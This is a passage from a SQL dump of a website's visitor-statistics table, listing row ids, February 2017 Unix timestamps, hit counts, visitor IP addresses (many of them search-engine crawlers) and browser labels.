86753306,1,1,0,0,'180.76.15.138','other'),(87866,1486754691,1,1,0,0,'207.46.13.93','other'),(87867,1486754961,3,3,0,0,'51.254.214.172','other'),(87868,1486755198,1,1,0,0,'91.196.178.165','chrome'),(87869,1486755582,1,1,0,0,'91.196.178.167','chrome'),(87870,1486756810,1,1,0,0,'130.193.51.19','other'),(87871,1486760655,1,0,1,0,'66.249.64.59',''),(87872,1486761573,1,1,0,0,'157.55.39.137','other'),(87873,1486762176,1,1,0,0,'141.8.183.25','other'),(87874,1486763023,1,1,0,0,'130.193.51.19','other'),(87875,1486764742,1,1,0,0,'51.255.65.25','other'),(87876,1486764913,1,1,0,0,'207.46.13.93','other'),(87877,1486766878,1,1,0,0,'51.255.65.13','other'),(87878,1486766966,1,1,0,0,'40.77.167.79','other'),(87879,1486767513,1,0,1,0,'66.249.64.187',''),(87880,1486768107,1,1,0,0,'5.45.192.85','chrome'),(87881,1486769051,1,1,0,0,'207.46.13.84','other'),(87882,1486769226,1,1,0,0,'5.45.192.85','chrome'),(87883,1486769981,1,1,0,0,'80.64.81.37','chrome'),(87884,1486773133,1,1,0,0,'109.173.100.12','chrome'),(87885,1486773772,1,0,1,0,'66.249.64.183',''),(87886,1486774753,1,0,1,0,'68.180.228.230',''),(87887,1486779083,1,1,0,0,'207.46.13.84','other'),(87888,1486780358,1,1,0,0,'141.8.142.175','other'),(87889,1486780998,1,0,1,0,'68.180.228.230',''),(87890,1486781006,1,1,0,0,'207.46.13.84','other'),(87891,1486785063,1,0,1,0,'66.249.64.187',''),(87892,1486785895,1,1,0,0,'40.77.167.79','other'),(87893,1486786054,1,1,0,0,'51.255.65.20','other'),(87894,1486786385,1,1,0,0,'66.249.64.59','chrome'),(87895,1486786394,1,1,0,0,'66.249.64.183','chrome'),(87896,1486787458,1,1,0,0,'128.72.252.18','msie'),(87897,1486788234,1,0,1,0,'68.180.228.230',''),(87898,1486789834,1,1,0,0,'51.255.65.67','other'),(87899,1486789899,1,1,0,0,'163.172.64.178','other'),(87900,1486790285,1,1,0,0,'164.132.161.2','other'),(87901,1486790826,1,0,1,0,'68.180.228.230',''),(87902,1486791550,1,1,0,0,'37.115.113.62','chrome'),(87903,1486792633,1,1,0,0,'207.46.13.84','other'),(87904,1486794131,1,1,0,0,'51.255.65.68','other'),(87905,1486794413,1,1,0,0,'46.211.200.122','chrome'),(87906,1486795168,2,2,0,0,'95.213.141.126','opera'),(87907,1486795611,1,1,0,0,'51.255.65.80','other'),(87908,1486795986,1,1,0,0,'163.172.64.231','other'),(87909,1486796273,1,1,0,0,'164.132.161.66','other'),(87910,1486797521,1,1,0,0,'141.8.183.19','other'),(87911,1486797525,1,1,0,0,'141.8.132.10','other'),(87912,1486797573,1,1,0,0,'40.77.167.79','other'),(87913,1486799110,1,1,0,0,'163.172.64.244','other'),(87914,1486799209,1,0,1,0,'66.249.64.179',''),(87915,1486799253,3,0,3,0,'66.249.64.59',''),(87916,1486799254,1,0,1,0,'66.249.64.57',''),(87917,1486800571,1,1,0,0,'207.46.13.84','other'),(87918,1486802981,1,1,0,0,'164.132.161.45','other'),(87919,1486803029,1,0,1,0,'66.249.64.183',''),(87920,1486803370,1,1,0,0,'66.102.9.25','chrome'),(87921,1486804029,2,1,1,0,'66.249.64.59',''),(87922,1486804560,2,0,2,0,'66.249.64.57',''),(87923,1486805326,1,1,0,0,'164.132.161.97','other'),(87924,1486805584,1,1,0,0,'91.196.122.190','chrome'),(87925,1486806074,1,0,1,0,'66.249.64.61',''),(87926,1486806092,3,0,3,0,'66.249.64.57',''),(87927,1486806154,2,1,1,0,'66.249.64.59',''),(87928,1486806225,1,0,1,0,'66.249.64.179',''),(87929,1486806935,1,1,0,0,'157.55.39.137','other'),(87930,1486807576,1,1,0,0,'164.132.161.92','other'),(87931,1486808324,3,1,2,0,'66.249.64.59',''),(87932,1486808341,2,1,1,0,'66.249.64.61',''),(87933,1486808386,1,1,0,0,'66.249.64.187','chrome'),(87934,1486808847,1,1,0,0,'40.77.167.79','other'),(87935,1486810104,2,0,2,0,'66.249.64.57',''),(87936,1486810362,1,1,0,0,'217.69.133.234','other'),(87937,1486811256,1,0,1,0,'66.249.64.57',''),(87938,1486812143,1,1,0,0,'157.55.39.137','other'),(87939,1486813062,1,0,1,0,'66.249.64.179',''),(87940,1486813394,1,1,0,0,'164.132.161.36','other'),(87941,1486813664,5,5,0,0,'130.193.50.34','other'),(87942,1486813669,1,1,0,0,'141.8.142.175','other'),(87943,1486813835,1,1,0,0,'163.172.64.254','other'),(87944,1486815028,1,1,0,0,'92.113.126.94','firefox'),(87945,1486815290,1,1,0,0,'164.132.161.13','other'),(87946,1486815749,1,1,0,0,'94.180.144.104','msie'),(87947,1486816094,1,1,0,0,'180.76.15.139','other'),(87948,1486817736,1,1,0,0,'180.76.15.157','other'),(87949,1486818323,1,1,0,0,'51.255.65.75','other'),(87950,1486820662,1,1,0,0,'207.46.13.84','other'),(87951,1486820740,1,1,0,0,'51.255.65.84','other'),(87952,1486821963,1,1,0,0,'31.43.7.159','chrome'),(87953,1486822034,1,1,0,0,'130.193.50.34','other'),(87954,1486822400,1,1,0,0,'51.255.65.14','other'),(87955,1486822491,1,1,0,0,'66.249.64.57','chrome'),(87956,1486822807,1,1,0,0,'164.132.161.96','other'),(87957,1486822996,1,1,0,0,'217.69.136.205','other'),(87958,1486823498,1,1,0,0,'51.255.65.57','other'),(87959,1486823522,1,1,0,0,'83.209.116.38','firefox'),(87960,1486823795,1,1,0,0,'164.132.161.31','other'),(87961,1486824291,1,1,0,0,'95.84.179.186','msie'),(87962,1486824707,1,1,0,0,'164.132.161.85','other'),(87963,1486825486,1,0,1,0,'68.180.228.230',''),(87964,1486825520,1,1,0,0,'95.28.55.14','msie'),(87965,1486825720,1,1,0,0,'51.255.65.62','other'),(87966,1486825816,1,1,0,0,'37.112.38.132','msie'),(87967,1486825818,1,1,0,0,'51.255.65.17','other'),(87968,1486826679,1,1,0,0,'164.132.161.4','other'),(87969,1486829812,1,1,0,0,'66.249.64.61','chrome'),(87970,1486832305,1,1,0,0,'46.200.10.177','chrome'),(87971,1486833935,1,1,0,0,'207.46.13.84','other'),(87972,1486834219,1,1,0,0,'91.196.178.135','chrome'),(87973,1486835119,1,1,0,0,'195.154.181.15','chrome'),(87974,1486836253,1,1,0,0,'130.180.212.82','chrome'),(87975,1486838695,1,0,1,0,'66.249.64.57',''),(87976,1486838715,1,1,0,0,'185.26.182.31','opera'),(87977,1486839862,1,1,0,0,'185.26.182.31','opera'),(87978,1486840219,4,4,0,0,'93.180.64.220','other'),(87979,1486841547,6,6,0,0,'93.180.64.220','other'),(87980,1486842404,1,1,0,0,'66.249.64.179','chrome'),(87981,1486843427,1,1,0,0,'82.193.121.44','chrome'),(87982,1486844311,1,1,0,0,'207.46.13.84','other'),(87983,1486844471,1,1,0,0,'180.76.15.157','other'),(87984,1486845577,1,1,0,0,'176.195.125.29','chrome'),(87985,1486846084,1,1,0,0,'91.196.178.165','chrome'),(87986,1486849424,1,1,0,0,'66.249.64.61','chrome'),(87987,1486849426,1,1,0,0,'66.249.64.187','chrome'),(87988,1486849630,1,1,0,0,'130.193.51.19','other'),(87989,1486851817,1,1,0,0,'207.46.13.93','other'),(87990,1486852725,1,1,0,0,'164.132.161.69','other'),(87991,1486852954,1,1,0,0,'176.195.44.85','opera'),(87992,1486854299,1,1,0,0,'40.77.167.93','other'),(87993,1486857338,1,1,0,0,'176.15.237.212','firefox'),(87994,1486859451,1,1,0,0,'180.76.15.7','other'),(87995,1486860127,1,1,0,0,'51.255.65.85','other'),(87996,1486860532,1,1,0,0,'51.255.65.88','other'),(87997,1486861671,1,1,0,0,'163.172.64.231','other'),(87998,1486862909,1,1,0,0,'164.132.161.91','other'),(87999,1486863047,1,1,0,0,'163.172.64.253','other'),(88000,1486864065,1,1,0,0,'163.172.64.232','other'),(88001,1486864304,1,1,0,0,'51.255.65.59','other'),(88002,1486864490,1,0,1,0,'66.249.64.57',''),(88003,1486865815,1,0,1,0,'68.180.229.62',''),(88004,1486867018,1,1,0,0,'66.249.64.57','chrome'),(88005,1486867068,1,0,1,0,'68.180.229.62',''),(88006,1486867709,4,4,0,0,'207.46.13.155','other'),(88007,1486868781,1,1,0,0,'51.255.65.87','other'),(88008,1486872012,1,1,0,0,'207.46.13.155','other'),(88009,1486872457,1,1,0,0,'164.132.161.70','other'),(88010,1486873951,1,0,1,0,'66.249.64.61',''),(88011,1486874063,1,1,0,0,'185.31.165.4','msie'),(88012,1486874405,1,1,0,0,'207.46.13.155','other'),(88013,1486874773,1,1,0,0,'164.132.161.10','other'),(88014,1486877174,1,0,1,0,'66.249.64.179',''),(88015,1486877748,1,0,1,0,'68.180.228.230',''),(88016,1486878416,2,2,0,0,'208.90.57.196','firefox'),(88017,1486879505,1,1,0,0,'130.193.50.34','other'),(88018,1486883130,1,1,0,0,'163.172.64.254','other'),(88019,1486883379,1,1,0,0,'164.132.161.35','other'),(88020,1486884785,1,1,0,0,'66.102.9.59','chrome'),(88021,1486885132,1,0,1,0,'66.249.64.57',''),(88022,1486886802,1,0,1,0,'66.249.64.179',''),(88023,1486887127,1,0,1,0,'66.249.64.61',''),(88024,1486887524,1,1,0,0,'91.196.178.35','chrome'),(88025,1486887669,1,1,0,0,'217.69.133.234','other'),(88026,1486887743,1,0,1,0,'68.180.228.230',''),(88027,1486888244,2,1,1,0,'66.249.64.59',''),(88028,1486888565,1,1,0,0,'91.196.178.35','chrome'),(88029,1486889024,1,1,0,0,'180.76.15.13','other'),(88030,1486889058,1,1,0,0,'40.77.167.79','other'),(88031,1486889151,1,1,0,0,'130.180.210.197','firefox'),(88032,1486889161,1,1,0,0,'130.193.50.34','other'),(88033,1486891467,1,1,0,0,'66.249.64.57','chrome'),(88034,1486892912,1,1,0,0,'94.178.146.87','chrome'),(88035,1486892921,1,1,0,0,'130.193.50.34','other'),(88036,1486897944,1,1,0,0,'180.76.15.22','other'),(88037,1486900203,1,1,0,0,'207.46.13.155','other'),(88038,1486901116,1,1,0,0,'207.46.13.93','other'),(88039,1486905986,2,0,2,0,'66.249.64.59',''),(88041,1486906001,5,1,4,0,'66.249.64.59',''),(88042,1486906267,4,0,4,0,'66.249.64.61',''),(88043,1486906273,5,0,5,0,'66.249.64.57',''),(88044,1486906928,3,0,3,0,'66.249.64.59',''),(88045,1486907438,1,0,1,0,'66.249.64.183',''),(88046,1486907447,2,0,2,0,'66.249.64.61',''),(88047,1486907721,2,0,2,0,'66.249.64.57',''),(88048,1486907968,1,1,0,0,'141.8.142.67','other'),(88049,1486907971,1,1,0,0,'94.178.6.41','chrome'),(88050,1486907972,1,1,0,0,'141.8.142.175','other'),(88051,1486908132,1,1,0,0,'130.193.50.34','other'),(88052,1486908536,1,1,0,0,'66.249.64.179','chrome'),(88053,1486908587,1,0,1,0,'66.249.64.183',''),(88054,1486908827,2,1,1,0,'66.249.64.61',''),(88055,1486908992,1,0,1,0,'66.249.64.187',''),(88056,1486909430,1,1,0,0,'66.249.64.59','chrome'),(88057,1486909834,1,1,0,0,'66.249.93.156','chrome'),(88058,1486909915,1,1,0,0,'91.196.178.38','firefox'),(88059,1486910922,3,0,3,0,'68.180.229.62',''),(88060,1486911014,1,0,1,0,'66.249.64.187',''),(88061,1486911740,1,1,0,0,'141.8.142.61','other'),(88062,1486911967,4,0,4,0,'68.180.229.62',''),(88063,1486912020,1,0,1,0,'207.46.13.129',''),(88064,1486912190,1,1,0,0,'66.249.64.61','chrome'),(88065,1486912200,2,2,0,0,'66.249.64.59','chrome'),(88066,1486912207,1,1,0,0,'141.8.132.10','other'),(88067,1486912599,2,0,2,0,'66.249.64.183',''),(88068,1486912636,1,1,0,0,'207.46.13.129','other'),(88069,1486912844,1,0,1,0,'66.249.64.57',''),(88070,1486913321,1,0,1,0,'68.180.229.62',''),(88071,1486913462,1,0,1,0,'66.249.64.61',''),(88072,1486913615,2,2,0,0,'141.8.183.25','other'),(88073,1486914281,1,1,0,0,'130.193.51.19','other'),(88074,1486914344,2,1,1,0,'66.249.64.59',''),(88075,1486914347,1,1,0,0,'66.249.64.61','chrome'),(88076,1486914376,1,0,1,0,'66.249.64.57',''),(88077,1486915103,2,2,0,0,'207.46.13.129','other'),(88078,1486915249,1,1,0,0,'130.193.50.34','other'),(88079,1486915482,1,0,1,0,'66.249.64.183',''),(88080,1486915780,1,0,1,0,'66.249.64.61',''),(88081,1486916115,1,0,1,0,'66.249.64.179',''),(88082,1486916216,1,1,0,0,'141.8.142.85','other'),(88083,1486916229,1,1,0,0,'130.193.51.14','other'),(88084,1486916241,9,9,0,0,'141.8.142.175','other'),(88085,1486916245,5,5,0,0,'141.8.183.25','other'),(88086,1486916276,1,1,0,0,'66.249.64.59','chrome'),(88087,1486916566,3,3,0,0,'95.135.242.192','chrome'),(88088,1486916672,2,2,0,0,'94.179.43.249','chrome'),(88089,1486917020,1,1,0,0,'141.8.132.10','other'),(88090,1486917024,3,3,0,0,'141.8.142.58','other'),(88091,1486917038,5,5,0,0,'130.193.50.34','other'),(88092,1486917042,9,9,0,0,'130.193.51.19','other'),(88093,1486917053,1,1,0,0,'141.8.142.61','other'),(88094,1486917089,2,0,2,0,'66.249.64.179',''),(88095,1486917145,1,1,0,0,'141.8.142.175','other'),(88096,1486917148,3,3,0,0,'141.8.183.25','other'),(88097,1486917360,1,1,0,0,'46.211.152.111','other'),(88098,1486917400,1,1,0,0,'66.249.64.61','chrome'),(88099,1486917438,1,1,0,0,'66.249.64.59','chrome'),(88100,1486917457,1,1,0,0,'46.211.200.2','chrome'),(88101,1486917713,1,1,0,0,'46.242.77.172','msie'),(88102,1486918080,1,1,0,0,'66.249.64.187','chrome'),(88103,1486918191,1,1,0,0,'141.8.142.61','other'),(88104,1486918403,1,1,0,0,'141.8.183.19','other'),(88105,1486918405,1,1,0,0,'141.8.142.67','other'),(88106,1486918726,1,0,1,0,'66.249.64.61',''),(88107,1486918830,1,0,1,0,'66.249.64.179',''),(88108,1486919068,1,0,1,0,'66.249.64.59',''),(88109,1486919399,1,0,1,0,'66.249.64.57',''),(88110,1486920803,1,0,1,0,'66.249.64.179',''),(88111,1486922650,1,1,0,0,'40.77.167.79','other'),(88112,1486925609,1,1,0,0,'91.196.178.167','chrome'),(88113,1486927356,1,1,0,0,'46.63.36.212','chrome'),(88114,1486929378,1,1,0,0,'164.132.161.16','other'),(88115,1486929582,1,0,1,0,'66.249.64.179',''),(88116,1486932751,1,1,0,0,'194.50.51.247','chrome'),(88117,1486932769,1,1,0,0,'130.193.50.34','other'),(88118,1486933259,1,1,0,0,'164.132.161.22','other'),(88119,1486936069,1,0,1,0,'66.249.64.57',''),(88120,1486937054,1,1,0,0,'207.46.13.155','other'),(88121,1486938967,1,1,0,0,'164.132.161.21','other'),(88122,1486939036,1,1,0,0,'141.8.183.19','other'),(88123,1486939897,1,0,1,0,'66.249.64.61',''),(88124,1486939900,1,0,1,0,'66.249.64.59',''),(88125,1486941398,1,0,1,0,'66.249.64.57',''),(88126,1486941544,2,0,2,0,'66.249.64.179',''),(88127,1486941918,1,0,1,0,'66.249.64.59',''),(88128,1486941983,1,1,0,0,'95.134.185.169','chrome'),(88129,1486944496,1,1,0,0,'51.255.65.24','other'),(88130,1486946579,1,1,0,0,'207.46.13.172','other'),(88131,1486947127,2,2,0,0,'62.210.162.42','chrome'),(88132,1486951815,1,1,0,0,'40.77.167.79','other'),(88133,1486952976,1,1,0,0,'51.255.65.29','other'),(88134,1486953178,1,0,1,0,'66.249.64.61',''),(88135,1486953309,2,0,2,0,'66.249.64.179',''),(88136,1486953365,1,1,0,0,'66.249.64.59','chrome'),(88137,1486953374,1,1,0,0,'66.249.64.187','chrome'),(88138,1486954135,1,1,0,0,'51.255.65.67','other'),(88139,1486957428,2,2,0,0,'93.180.64.220','other'),(88140,1486957602,1,0,1,0,'66.249.64.57',''),(88141,1486958430,2,2,0,0,'93.180.64.220','other'),(88142,1486959381,1,0,1,0,'66.249.64.179',''),(88143,1486960783,1,1,0,0,'51.255.65.25','other'),(88144,1486961967,1,1,0,0,'164.132.161.40','other'),(88145,1486962798,1,1,0,0,'180.76.15.163','other'),(88146,1486964924,1,1,0,0,'91.196.178.69','firefox'),(88147,1486967058,1,1,0,0,'207.46.13.172','other'),(88148,1486967436,1,1,0,0,'91.196.178.67','firefox'),(88149,1486969003,1,1,0,0,'164.132.161.88','other'),(88150,1486969239,2,2,0,0,'93.170.97.49','chrome'),(88151,1486970962,1,0,1,0,'66.249.64.183',''),(88152,1486971673,2,0,2,0,'66.249.64.59',''),(88153,1486971736,1,0,1,0,'66.249.64.187',''),(88154,1486971788,1,1,0,0,'37.52.23.154','chrome'),(88155,1486972181,1,1,0,0,'66.102.9.59','chrome'),(88156,1486972457,1,1,0,0,'62.210.103.36','other'),(88157,1486972656,3,3,0,0,'91.196.178.67','firefox'),(88158,1486972817,1,1,0,0,'207.46.13.172','other'),(88159,1486972855,1,1,0,0,'93.74.212.147','firefox'),(88160,1486972937,1,1,0,0,'213.108.45.138','firefox'),(88161,1486972979,2,2,0,0,'91.196.177.46','firefox'),(88162,1486973026,1,1,0,0,'130.180.219.1','firefox'),(88163,1486973581,1,1,0,0,'91.196.178.67','firefox'),(88164,1486974211,1,0,1,0,'66.249.64.183',''),(88165,1486975145,1,0,1,0,'66.249.64.179',''),(88166,1486975272,1,1,0,0,'164.132.161.29','other'),(88167,1486975282,1,1,0,0,'91.196.177.26','chrome'),(88168,1486975714,1,1,0,0,'94.179.2.162','firefox'),(88169,1486976230,1,1,0,0,'91.196.178.67','firefox'),(88170,1486977674,1,1,0,0,'164.132.161.4','other'),(88171,1486977709,1,1,0,0,'51.255.65.22','other'),(88172,1486977736,1,1,0,0,'91.196.178.71','firefox'),(88173,1486977904,1,1,0,0,'95.134.2.228','chrome'),(88174,1486977956,1,1,0,0,'91.196.178.129','firefox'),(88175,1486978126,1,1,0,0,'92.112.28.209','chrome'),(88176,1486978249,2,2,0,0,'91.196.178.67','firefox'),(88177,1486978361,2,2,0,0,'91.196.178.66','firefox'),(88178,1486979428,1,1,0,0,'207.46.13.93','other'),(88179,1486979726,1,1,0,0,'66.249.64.61','chrome'),(88180,1486979847,1,1,0,0,'94.179.2.162','firefox'),(88181,1486979871,1,1,0,0,'91.192.200.14','other'),(88182,1486980881,1,1,0,0,'91.196.178.67','firefox'),(88183,1486980953,1,1,0,0,'180.76.15.139','other'),(88184,1486981219,1,1,0,0,'94.178.106.2','chrome'),(88185,1486981780,1,1,0,0,'164.132.161.56','other'),(88186,1486982034,1,1,0,0,'213.108.44.11','chrome'),(88187,1486982088,1,1,0,0,'111.206.36.13','firefox'),(88188,1486982127,1,1,0,0,'91.196.178.162','chrome'),(88189,1486982588,1,1,0,0,'207.46.13.172','other'),(88190,1486983267,1,1,0,0,'91.196.177.26','chrome'),(88191,1486983491,2,2,0,0,'91.196.178.65','firefox'),(88192,1486983724,1,1,0,0,'66.249.64.57','chrome'),(88194,1486983876,1,0,1,0,'66.249.64.59',''),(88195,1486984945,1,0,1,0,'66.249.64.61',''),(88196,1486985343,1,1,0,0,'207.46.13.93','other'),(88197,1486985860,1,1,0,0,'164.132.161.73','other'),(88198,1486986066,1,1,0,0,'95.134.2.228','chrome'),(88199,1486987397,1,1,0,0,'91.196.178.71','firefox'),(88200,1486987642,1,1,0,0,'66.249.64.187','chrome'),(88201,1486987764,1,1,0,0,'91.196.178.72','firefox'),(88202,1486987811,1,1,0,0,'77.122.206.201','chrome'),(88203,1486988400,1,1,0,0,'163.172.64.237','other'),(88204,1486988694,1,1,0,0,'213.154.209.203','firefox'),(88205,1486989272,1,1,0,0,'46.149.95.166','chrome'),(88206,1486990159,1,1,0,0,'51.255.65.89','other'),(88207,1486990518,1,1,0,0,'37.53.131.53','chrome'),(88208,1486991252,1,1,0,0,'91.196.177.26','chrome'),(88209,1486991544,1,1,0,0,'176.98.27.243','chrome'),(88210,1486991775,1,1,0,0,'92.113.34.102','chrome'),(88211,1486991794,1,1,0,0,'130.193.51.74','other'),(88212,1486992667,1,1,0,0,'37.53.229.30','firefox'),(88213,1486992746,1,1,0,0,'91.196.178.67','firefox'),(88214,1486993150,1,1,0,0,'157.55.39.250','other'),(88215,1486993733,1,1,0,0,'91.196.178.66','chrome'),(88216,1486995168,1,0,1,0,'66.249.64.183',''),(88217,1486995337,2,0,2,0,'66.249.64.187',''),(88218,1486995401,1,1,0,0,'91.196.178.162','chrome'),(88219,1486995862,1,1,0,0,'91.196.178.129','firefox'),(88220,1486996156,1,1,0,0,'207.46.13.172','other'),(88221,1486996195,1,1,0,0,'95.133.153.138','chrome'),(88222,1486996509,1,1,0,0,'194.79.20.235','firefox'),(88223,1486997129,1,1,0,0,'91.196.178.67','firefox'),(88224,1486997492,1,1,0,0,'91.196.178.71','firefox'),(88225,1486997705,1,1,0,0,'95.133.159.146','chrome'),(88226,1486998609,1,1,0,0,'37.53.229.30','firefox'),(88227,1486998857,1,1,0,0,'207.46.13.59','other'),(88228,1486998873,1,1,0,0,'91.196.178.66','other'),(88229,1486999023,1,1,0,0,'91.196.178.71','firefox'),(88230,1487001279,1,1,0,0,'66.249.93.156','chrome'),(88231,1487002399,8,8,0,0,'82.193.100.107','other'),(88232,1487002731,1,1,0,0,'157.55.39.106','other'),(88233,1487003077,1,0,1,0,'66.249.76.28',''),(88234,1487003580,1,1,0,0,'66.249.76.108','chrome'),(88235,1487004472,1,1,0,0,'180.76.15.5','other'),(88236,1487004711,3,0,3,0,'66.249.76.107',''),(88237,1487004767,2,0,2,0,'66.249.66.81',''),(88238,1487004834,1,0,1,0,'66.249.76.29',''),(88239,1487005000,1,0,1,0,'66.249.76.27',''),(88240,1487005870,1,1,0,0,'66.249.76.28','chrome'),(88241,1487006605,3,3,0,0,'91.209.51.22','other'),(88242,1487006961,1,1,0,0,'66.249.66.84','chrome'),(88243,1487007420,1,1,0,0,'66.249.76.107','chrome'),(88244,1487007454,1,1,0,0,'92.113.191.23','firefox'),(88245,1487009044,1,1,0,0,'91.196.178.67','firefox'),(88246,1487009644,1,1,0,0,'66.249.76.109','chrome'),(88247,1487010530,1,0,1,0,'66.249.76.107',''),(88248,1487010860,1,1,0,0,'207.46.13.172','other'),(88249,1487011688,1,1,0,0,'207.46.13.59','other'),(88250,1487012844,1,1,0,0,'66.249.76.107','chrome'),(88251,1487013873,1,0,1,0,'66.249.76.107',''),(88252,1487013888,1,1,0,0,'157.55.39.250','other'),(88253,1487014842,1,0,1,0,'66.249.76.29',''),(88254,1487014874,1,1,0,0,'208.90.57.196','firefox'),(88255,1487014924,1,0,1,0,'66.249.76.109',''),(88256,1487014975,1,0,1,0,'66.249.76.28',''),(88257,1487014991,1,0,1,0,'66.249.76.107',''),(88258,1487015144,1,1,0,0,'46.211.250.8','chrome'),(88259,1487015788,1,0,1,0,'66.249.76.27',''),(88260,1487016064,1,0,1,0,'66.249.76.108',''),(88261,1487016553,1,0,1,0,'66.249.76.29',''),(88262,1487016858,1,0,1,0,'66.249.76.27',''),(88263,1487016886,1,0,1,0,'66.249.66.84',''),(88264,1487017317,2,0,2,0,'66.249.76.28',''),(88265,1487017389,2,0,2,0,'66.249.76.107',''),(88266,1487017583,1,1,0,0,'91.196.178.162','chrome'),(88267,1487018077,1,0,1,0,'66.249.76.27',''),(88268,1487019027,1,0,1,0,'66.249.76.28',''),(88269,1487019771,1,1,0,0,'94.179.12.241','chrome'),(88270,1487020008,1,0,1,0,'66.249.76.29',''),(88271,1487020379,1,1,0,0,'66.249.76.107','chrome'),(88272,1487020600,1,1,0,0,'66.249.76.29','chrome'),(88273,1487020830,1,0,1,0,'66.249.76.27',''),(88274,1487020855,1,1,0,0,'91.196.178.161','chrome'),(88275,1487021216,1,0,1,0,'66.249.76.108',''),(88276,1487021712,2,0,2,0,'66.249.76.28',''),(88277,1487022000,1,0,1,0,'66.249.66.183',''),(88278,1487022064,1,0,1,0,'66.249.66.81',''),(88279,1487022303,1,0,1,0,'66.249.76.27',''),(88280,1487023399,1,0,1,0,'66.249.76.107',''),(88281,1487023648,1,0,1,0,'66.249.76.29',''),(88282,1487023741,1,1,0,0,'46.211.156.97','chrome'),(88283,1487024448,1,1,0,0,'66.249.76.109','chrome'),(88284,1487024474,1,1,0,0,'95.28.49.214','msie'),(88285,1487028005,1,1,0,0,'66.249.66.183','chrome'),(88286,1487028498,1,0,1,0,'66.249.76.27',''),(88287,1487029240,1,0,1,0,'66.249.76.29',''),(88288,1487029746,1,1,0,0,'66.249.76.107','chrome'),(88289,1487030793,2,0,2,0,'66.249.76.28',''),(88290,1487030943,2,2,0,0,'91.200.12.49','msie'),(88291,1487031410,1,1,0,0,'164.132.161.41','other'),(88292,1487031718,1,0,1,0,'66.249.76.107',''),(88293,1487033334,1,1,0,0,'5.255.198.74','other'),(88294,1487035404,1,1,0,0,'51.255.65.4','other'),(88295,1487035651,1,0,1,0,'66.249.66.87',''),(88296,1487035856,1,0,1,0,'66.249.76.27',''),(88297,1487036177,1,0,1,0,'66.249.66.183',''),(88298,1487036914,1,1,0,0,'66.249.76.107','chrome'),(88299,1487037388,1,1,0,0,'207.46.13.172','other'),(88300,1487038004,8,8,0,0,'144.76.12.99','other'),(88301,1487038063,1,0,1,0,'66.249.76.29',''),(88302,1487038463,1,0,1,0,'66.249.76.109',''),(88303,1487038546,1,0,1,0,'66.249.66.81',''),(88304,1487038681,1,1,0,0,'180.76.15.151','other'),(88305,1487039083,1,1,0,0,'178.255.215.94','other'),(88306,1487039174,2,0,2,0,'66.249.76.29',''),(88307,1487040213,2,0,2,0,'66.249.76.27',''),(88308,1487040536,1,0,1,0,'66.249.66.180',''),(88309,1487041838,1,0,1,0,'66.249.66.180',''),(88310,1487043131,1,1,0,0,'163.172.64.252','other'),(88311,1487043187,1,1,0,0,'163.172.64.245','other'),(88312,1487044165,1,1,0,0,'207.46.13.172','other'),(88313,1487045105,1,0,1,0,'66.249.66.87',''),(88314,1487045175,2,0,2,0,'66.249.76.27',''),(88315,1487045270,1,0,1,0,'66.249.76.108',''),(88316,1487045389,1,1,0,0,'164.132.161.95','other'),(88317,1487045448,1,0,1,0,'66.249.76.109',''),(88318,1487046609,1,1,0,0,'51.255.65.4','other'),(88319,1487046702,1,1,0,0,'66.249.76.108','chrome'),(88320,1487046796,1,1,0,0,'164.132.161.13','other'),(88321,1487047087,1,1,0,0,'66.249.66.197','chrome'),(88322,1487047347,1,0,1,0,'66.249.76.29',''),(88323,1487050580,1,1,0,0,'91.196.178.65','firefox'),(88324,1487052896,1,1,0,0,'207.46.13.172','other'),(88325,1487053679,1,1,0,0,'91.196.178.67','firefox'),(88326,1487054174,1,0,1,0,'66.249.76.109',''),(88327,1487054751,1,1,0,0,'95.133.193.182','firefox'),(88328,1487055486,1,1,0,0,'91.196.178.66','chrome'),(88329,1487055786,1,0,1,0,'66.249.66.188',''),(88330,1487056186,1,0,1,0,'66.249.76.109',''),(88331,1487056204,2,0,2,0,'66.249.76.107',''),(88332,1487056274,1,1,0,0,'95.135.240.52','chrome'),(88333,1487056283,1,1,0,0,'91.196.178.66','firefox'),(88334,1487056528,1,0,1,0,'66.249.66.185',''),(88335,1487056649,1,1,0,0,'66.102.9.27','chrome'),(88336,1487056741,1,1,0,0,'66.249.66.182','chrome'),(88337,1487057025,1,0,1,0,'66.249.76.108',''),(88338,1487057350,1,1,0,0,'91.196.178.133','firefox'),(88339,1487057398,1,1,0,0,'91.196.178.40','chrome'),(88340,1487057422,1,0,1,0,'66.249.76.28',''),(88341,1487057811,14,14,0,0,'62.212.73.211','other'),(88342,1487057873,1,1,0,0,'164.132.161.96','other'),(88343,1487057947,1,0,1,0,'66.249.76.108',''),(88344,1487059309,1,1,0,0,'94.179.7.35','firefox'),(88345,1487059675,1,1,0,0,'207.46.13.172','other'),(88346,1487059951,1,1,0,0,'37.187.111.153','other'),(88347,1487060391,1,1,0,0,'91.196.178.39','firefox'),(88348,1487060973,1,1,0,0,'91.196.177.15','chrome'),(88349,1487061237,1,1,0,0,'82.207.114.136','firefox'),(88350,1487061390,1,1,0,0,'37.52.23.154','chrome'),(88351,1487061673,1,1,0,0,'91.196.178.70','firefox'),(88352,1487061865,1,0,1,0,'66.249.76.27',''),(88353,1487061885,1,1,0,0,'91.196.178.165','chrome'),(88354,1487062494,1,1,0,0,'82.207.59.182','firefox'),(88355,1487062895,1,1,0,0,'37.52.23.154','chrome'),(88356,1487062998,1,1,0,0,'91.196.178.161','chrome'),(88357,1487063499,1,1,0,0,'91.196.178.68','firefox'),(88358,1487063531,1,0,1,0,'68.180.229.62',''),(88359,1487064437,1,1,0,0,'95.132.104.186','firefox'),(88360,1487064458,1,1,0,0,'141.8.142.175','other'),(88361,1487064848,2,2,0,0,'157.55.39.250','other'),(88362,1487064869,1,1,0,0,'91.196.178.68','firefox'),(88363,1487065031,1,1,0,0,'91.196.178.71','chrome'),(88364,1487065770,1,1,0,0,'91.213.33.62','chrome'),(88365,1487065789,1,1,0,0,'141.8.183.25','other'),(88366,1487065872,1,1,0,0,'37.55.215.242','chrome'),(88367,1487065889,1,1,0,0,'141.8.142.175','other'),(88368,1487066236,1,1,0,0,'78.111.190.24','firefox'),(88369,1487066883,1,1,0,0,'91.229.216.13','chrome'),(88370,1487066908,1,1,0,0,'141.8.183.25','other'),(88371,1487067201,1,1,0,0,'93.175.236.51','firefox'),(88372,1487067218,1,1,0,0,'141.8.142.175','other'),(88373,1487067675,1,0,1,0,'66.249.76.27',''),(88374,1487067693,1,1,0,0,'66.249.76.108','chrome'),(88375,1487068210,1,1,0,0,'141.8.142.61','other'),(88376,1487068214,1,1,0,0,'141.8.142.175','other'),(88377,1487069234,1,1,0,0,